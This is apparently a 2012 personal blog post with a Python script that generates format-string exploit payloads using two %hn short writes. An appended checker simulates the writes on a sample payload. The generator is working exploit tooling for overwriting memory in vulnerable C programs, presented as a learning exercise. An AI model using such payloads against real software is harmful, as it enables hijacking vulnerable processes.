Friday, July 13, 2012

Those annoying format string exploits

Format string exploits are a pain to write manually.  And it's really easy to make an error, adjust a bunch of stuff, then realize that you had the wrong offset and everything needs to be re-calculated.  I got fed up tonight and (based on the short (2 byte) write examples in this [Table 12-2]) wrote a little program to automate it for me.  I know there are many examples of this out there (@tlas's toolbelt, etc.), but I felt like I needed to go through the process to cement my understanding of it.  And I like python more than perl. SO:


#! /usr/bin/env python3
from sys import argv, stdout
import struct


if len(argv) < 4:
    print('usage:\n\t' + argv[0] + '  <addr_to_write_to>  <addr_to_write> <offset>')
    exit(0)

addr_to_write_to = int(argv[1], 16)   # where the two %hn writes land
addr_to_write    = int(argv[2], 16)   # the 32-bit value to plant there
offset           = int(argv[3])       # positional arg holding the first address

# split the value into its high and low 16-bit halves
HOB = (addr_to_write & 0xffff0000) >> 16
LOB = addr_to_write & 0x0000ffff

# both addresses go first: arg `offset` -> addr+2 (high half), arg `offset+1` -> addr (low half);
# the 8 address bytes are already part of the %n count, hence the -8 on the first padding
s = struct.pack('<I', addr_to_write_to + 2)
s += struct.pack('<I', addr_to_write_to)
if HOB < LOB:
    # write the smaller half (HOB) first, then pad up to LOB
    s += b'%%.%dx' % (HOB - 8)
    s += b'%%%d$hn' % offset
    s += b'%%.%dx' % (LOB - HOB)
    s += b'%%%d$hn' % (offset + 1)
elif HOB > LOB:
    # write the smaller half (LOB) first, then pad up to HOB
    s += b'%%.%dx' % (LOB - 8)
    s += b'%%%d$hn' % (offset + 1)
    s += b'%%.%dx' % (HOB - LOB)
    s += b'%%%d$hn' % offset
else:  # HOB == LOB: pad a full 0x10000 so the count wraps back to the same low 16 bits
    s += b'%%.%dx' % (HOB - 8)
    s += b'%%%d$hn' % offset
    s += b'%%.%dx' % 0x10000
    s += b'%%%d$hn' % (offset + 1)

# raw bytes, not text: the packed addresses are not valid UTF-8
stdout.buffer.write(s + b'\n')
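A check for the payload the script produces, added here as an example rather than the post's own code: it walks the format string the way printf counts characters and reports the 16-bit value each %hn would store, so a wrong offset or padding shows up before the payload is ever used. The sample payload, target address and offset are constructed for the demonstration; the simulator assumes the script's layout (two addresses at args `offset` and `offset+1`) and that every %.Nx precision is at least 8, so the precision alone fixes the width.

```python
import re
import struct

# Constructed sample of the script's output for
#   addr_to_write_to = 0xbffff3c0, addr_to_write = 0x0804a010, offset = 7
# HOB = 0x0804 < LOB = 0xa010, so the high half is written first.
SAMPLE_TARGET = 0xbffff3c0
SAMPLE_OFFSET = 7
SAMPLE_PAYLOAD = (struct.pack('<I', SAMPLE_TARGET + 2)
                  + struct.pack('<I', SAMPLE_TARGET)
                  + b'%.2044x%7$hn%.38924x%8$hn')

# the only two directives the script emits: padding and a short write
DIRECTIVE = re.compile(rb'%\.(\d+)x|%(\d+)\$hn')

def simulate_hn_writes(payload, offset):
    """Walk the payload as printf would and return {address: 16-bit value}.

    Assumes the two leading addresses sit at positional args `offset` and
    `offset + 1` (the script's layout) and that every %.Nx has N >= 8, so
    the precision alone decides how many characters it prints.
    """
    if len(payload) < 8:
        raise ValueError('payload too short to hold two addresses')
    args = {offset: struct.unpack('<I', payload[0:4])[0],
            offset + 1: struct.unpack('<I', payload[4:8])[0]}
    count = 8           # the 8 address bytes are printed before any directive
    writes = {}
    pos = 8
    for m in DIRECTIVE.finditer(payload, pos):
        if m.start() != pos:
            raise ValueError('unrecognised bytes at position %d' % pos)
        if m.group(1) is not None:
            count += int(m.group(1))               # %.Nx: N more characters
        else:
            k = int(m.group(2))
            if k not in args:
                raise ValueError('%%%d$hn names an arg the payload did not place' % k)
            writes[args[k]] = count & 0xffff       # %hn keeps the low 16 bits
        pos = m.end()
    if pos != len(payload):
        raise ValueError('trailing bytes after the last directive')
    return writes

def written_dword(writes, target):
    """Reassemble the little-endian 32-bit value the two halves form at target."""
    return (writes[target + 2] << 16) | writes[target]
```

If the reassembled value is not the address you asked the script for, the offset or the padding arithmetic is off; fix that before touching anything else.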
